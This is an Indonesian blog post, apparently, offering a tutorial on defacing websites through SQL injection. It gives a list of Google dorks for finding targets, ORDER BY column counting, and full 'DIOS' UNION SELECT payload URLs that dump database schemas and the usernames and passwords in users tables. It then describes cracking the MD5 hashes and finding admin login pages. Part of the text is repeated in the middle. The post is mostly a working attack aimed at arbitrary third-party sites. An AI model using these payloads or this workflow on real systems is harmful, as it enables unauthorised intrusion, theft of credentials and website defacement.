Tutorial Deface SQL With Dios 2020
Selasa, 11 Februari 2020
Tambah Komentar
Halo sobat kali ini saya akan membagikan tutorial deface SQL With Dios 2020.
Yuk sobat kita langsung aja ya!
Bahan Bahan Yang Kalian Perlukan :
Untuk Dork Nya :
about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
(Kembangin lagi)
Yuk langsung aja kita gas.
Step 1 :
Kalian dorking dulu di google dengan Dork di atas.
Setelah kalian dorking kalian pilih salah 1 target kalian apa bila sudah ketemu target kalian maka cek Vuln apa kaga nya dengan petik ( ' )
Contoh :
https://target.com/news.php?id=1
(Cek vuln)
https://target.com/news.php?id=1'
https://target.com/news.php?id=1+order+by+2--+-
(No Error)
https://target.com/news.php?id=1+order+by+3--+-
(No Error)
https://target.com/news.php?id=1+order+by+4--+-
(No Error)
https://target.com/news.php?id=1+order+by+5--+-
(No Error)
https://target.com/news.php?id=1+order+by+6--+-
(No Error)
https://target.com/news.php?id=1+order+by+7--+-
(No Error)
https://target.com/news.php?id=1+order+by+8--+-
(No Error)
https://target.com/news.php?id=1+order+by+9--+-
(No Error)
https://target.com/news.php?id=1+order+by+10--+-
(Unknown column '10' in 'order clause')
Yang saya lingkaran itu nomor togel nya ya teman teman.
Lalu langkah selanjut nya kalian masukkan perintah nya.
Contoh saya nomor togel nya 3 maka maka kalian hapus nomor 3 lalu kalian copy dios nya lalu kalian paste di angka 3 yang sudah kalian hapus.
Contoh : https://target.com/news.php?id=1+union+select+1,2,PASTEKAN DISINI DIOS NYA,4,5,6,7,8,9-+-
Jadi gini :
Lalu kalian cari table admin nya dengan.
Contoh : http://target.com/news.php?id=-51+union+select+1,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),4,5,6,7,8,9--+-
Yuk sobat kita langsung aja ya!
Bahan Bahan Yang Kalian Perlukan :
- Hp Atau PC
- Dios Kalian
Untuk Dork Nya :
about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
(Kembangin lagi)
Yuk langsung aja kita gas.
Step 1 :
Kalian dorking dulu di google dengan Dork di atas.
Setelah kalian dorking kalian pilih salah 1 target kalian apa bila sudah ketemu target kalian maka cek Vuln apa kaga nya dengan petik ( ' )
Contoh :
https://target.com/news.php?id=1
(Cek vuln)
https://target.com/news.php?id=1'
Step 2 :
Nah kalo misalkan web nya vuln maka ada bacaan seperti ini.
You have an error in your SQL syntax gini gini gini.
Nah kalo begitu tanda nya Vuln ya teman teman.
Step 3 :
Lalu kalian tambahkan order by
Contoh :
https://target.com/news.php?id=1+order+by+1--+-
Step 4 :
Contoh untuk mencari colum table nya kalian bisa cari dari angka 1 kalo kalian ingin cepat mencari table column nya maka kalian langsung dari angka 10 atau 15 dan seterusnya sampai dia ketemu colum nya ya teman teman.
Contoh saya mulai dari angka 1.
https://target.com/news.php?id=1+order+by+1--+-
(No Error)https://target.com/news.php?id=1+order+by+2--+-
(No Error)
https://target.com/news.php?id=1+order+by+3--+-
(No Error)
https://target.com/news.php?id=1+order+by+4--+-
(No Error)
https://target.com/news.php?id=1+order+by+5--+-
(No Error)
https://target.com/news.php?id=1+order+by+6--+-
(No Error)
https://target.com/news.php?id=1+order+by+7--+-
(No Error)
https://target.com/news.php?id=1+order+by+8--+-
(No Error)
https://target.com/news.php?id=1+order+by+9--+-
(No Error)
https://target.com/news.php?id=1+order+by+10--+-
(Unknown column '10' in 'order clause')
Nah Saya di angka 10 Error, maka table nya ada 9 kenapa ada 9? karna di 10 itu error.
Step 5 :
Lalu kita cari nomor togel nya.
Cara nya :
https://target.com/news.php?id=1+order+by+9--+-
Di ganti dengan :
https://target.com/news.php?id=1+union+select+1,2,3,4,5,6,7,8,9-+-
Maka nanti dia akan muncul nomor togel nya atau nomor ajaib nya. contoh gambar di bawah ini.
Step 5 :Yang saya lingkaran itu nomor togel nya ya teman teman.
Lalu langkah selanjut nya kalian masukkan perintah nya.
Contoh saya nomor togel nya 3 maka maka kalian hapus nomor 3 lalu kalian copy dios nya lalu kalian paste di angka 3 yang sudah kalian hapus.
Dios Pasaran : (select(@x)from(select(@@version ),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
Contoh : https://target.com/news.php?id=1+union+select+1,2,PASTEKAN DISINI DIOS NYA,4,5,6,7,8,9-+-
Jadi gini :
https://target.com/news.php?id=1+union+select+1,2,(select(@x)from(select(@@version ),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),4,5,6,7,8,9-+-
Lalu kalian enter maka lihat gambar di bawah ini.
Nah sudah ketemu keluar database nya maka kalian scroll kebawah lalu cari user dan pas nya ya tmn tmn.Lalu kalian cari table admin nya dengan.
(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x)
Contoh : http://target.com/news.php?id=-51+union+select+1,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),4,5,6,7,8,9--+-
Nah Saya sudah menemukan user dan pass nya. Lalu kalian kalo sudah menemukan user dan pass nya kalian pergi ke md5 ya buat nge hash pass nya biar jadi semula.
Kalo kalian sudah hash pass nya maka kalian cari adlog nya ya teman teman.
Contoh :
https://target.com/admin
https://target.com/adminweb
https://target.com/adminlogin
Oke segitu aja dari saya sisah nya (Use Brain)
Semoga bermanfaat.
Good Luck!!
Author : Tupai_Kun
Belum ada Komentar untuk "Tutorial Deface SQL With Dios 2020"
Posting Komentar